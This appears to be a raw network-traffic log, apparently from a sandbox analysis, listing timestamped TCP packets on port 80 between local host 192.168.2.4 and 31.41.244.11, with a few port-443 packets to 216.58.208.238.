Dec 22, 2024 02:16:51.465560913 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.465579033 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.465600967 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.465615988 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.468360901 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.468385935 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.468403101 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.468429089 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.470915079 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.470954895 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.471074104 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.471112013 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.473505974 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.473543882 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.473666906 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.473704100 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.476106882 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.476147890 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.476207018 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.476247072 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.478338003 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.478378057 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.478460073 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.478497982 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.480926037 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.480969906 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.481021881 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.481062889 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.483324051 CET	443	49874	216.58.208.238	192.168.2.4
Dec 22, 2024 02:16:51.483340979 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.483395100 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.483453035 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.483503103 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.485784054 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.485822916 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.485910892 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.485949993 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.488279104 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.488320112 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.488363028 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.488404036 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.490559101 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.490600109 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.490665913 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.490705013 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.492875099 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.492914915 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.492978096 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.493016005 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.495189905 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.495260000 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.495320082 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.495357990 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.497526884 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.497569084 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.497623920 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.497664928 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.499785900 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.499829054 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.499845982 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.499885082 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.501944065 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.501986980 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.502089977 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.502136946 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.504182100 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.504223108 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.504275084 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.504328966 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.506393909 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.506434917 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.506550074 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.506589890 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.508522987 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.508585930 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.508630037 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.508672953 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.510649920 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.510691881 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.510727882 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.510766029 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.512728930 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.512768984 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.512981892 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.513026953 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.514853954 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.514897108 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.514952898 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.514991999 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.516859055 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.516899109 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.517003059 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.517043114 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.518879890 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.518928051 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.518996000 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.519036055 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.520946980 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.520994902 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.521023989 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.521060944 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.522929907 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.522969961 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.523016930 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.523055077 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.524894953 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.524936914 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.524981022 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.525015116 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.526796103 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.526871920 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.526916027 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.526961088 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.528755903 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.528798103 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.528831959 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.528868914 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.530684948 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.530724049 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.530775070 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.530822039 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.532531023 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.532572031 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.532649040 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.532691002 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.534394026 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.534434080 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.534486055 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.534524918 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.536257029 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.536300898 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.536366940 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.536403894 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.538113117 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.538181067 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.538280010 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.538321018 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.546807051 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.546849966 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.546890974 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.546928883 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.547708035 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.547749043 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.547816992 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.547857046 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.549463034 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.549521923 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.549572945 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.549612045 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.551208019 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.551250935 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.551325083 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.551364899 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.552938938 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.552977085 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.553055048 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.553092957 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.554675102 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.554719925 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.554861069 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.554900885 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.556413889 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.556457043 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.556505919 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.556545019 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.558180094 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.558222055 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.558239937 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.558283091 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.559802055 CET	443	49867	216.58.208.238	192.168.2.4
Dec 22, 2024 02:16:51.559859991 CET	49867	443	192.168.2.4	216.58.208.238
Dec 22, 2024 02:16:51.559871912 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.559876919 CET	443	49867	216.58.208.238	192.168.2.4
Dec 22, 2024 02:16:51.559921980 CET	49867	443	192.168.2.4	216.58.208.238
Dec 22, 2024 02:16:51.559922934 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.559963942 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.560003996 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.560112000 CET	49867	443	192.168.2.4	216.58.208.238
Dec 22, 2024 02:16:51.560153008 CET	443	49867	216.58.208.238	192.168.2.4
Dec 22, 2024 02:16:51.560199022 CET	49867	443	192.168.2.4	216.58.208.238
Dec 22, 2024 02:16:51.561594009 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.561654091 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.561706066 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.561753035 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.563250065 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.563308001 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.563370943 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.563410997 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.564975023 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.565018892 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.565130949 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.565166950 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.566615105 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.566658020 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.566714048 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.566754103 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.568259954 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.568300962 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.568420887 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.568461895 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.571199894 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.571264029 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.571295977 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.571340084 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.571526051 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.571566105 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.571641922 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.571682930 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.573158026 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.573204041 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.573232889 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.573275089 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.574795961 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.574837923 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.574907064 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.574947119 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.576422930 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.576472044 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.576545000 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.576582909 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.578068018 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.578115940 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.578195095 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.578234911 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.579695940 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.579745054 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.579768896 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.579807043 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.581278086 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.581348896 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.581657887 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.581700087 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.582828999 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.582879066 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.582926989 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.582967043 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.584409952 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.584458113 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.584546089 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.584585905 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.585952997 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.586007118 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.586050034 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.586087942 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.587487936 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.587533951 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.587589979 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.587635040 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.589034081 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.589080095 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.589148045 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.589189053 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.590570927 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.590617895 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.590658903 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.590701103 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.592061043 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.592154026 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.592231989 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.592272043 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.593528032 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.593573093 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.593653917 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.593696117 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.595030069 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.595078945 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.595249891 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.595289946 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.596481085 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.596520901 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.596592903 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.596636057 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.597914934 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.597961903 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.598011017 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.598051071 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.599414110 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.599457979 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.599546909 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.599586964 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.600821018 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.600864887 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.600967884 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.601006031 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.602222919 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.602291107 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.602341890 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.602377892 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.603646040 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.603701115 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.603746891 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.603791952 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.605040073 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.605087042 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.605182886 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.605223894 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.606441975 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.606482029 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.606520891 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.606559992 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.607808113 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.607851982 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.607908964 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.607949018 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.609163046 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.609210968 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.609266996 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.609302998 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.610496998 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.610554934 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.610599041 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.610647917 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.611843109 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.611887932 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.611947060 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.611989021 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.613172054 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.613210917 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.613266945 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.613315105 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.614494085 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.614546061 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.614595890 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.614636898 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.615791082 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.615842104 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.615900040 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.615942955 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.617120028 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.617211103 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.617260933 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.617300034 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.618370056 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.618407965 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.618474960 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.618520021 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.619635105 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.619687080 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.619740009 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.619782925 CET	49872	80	192.168.2.4	31.41.244.11
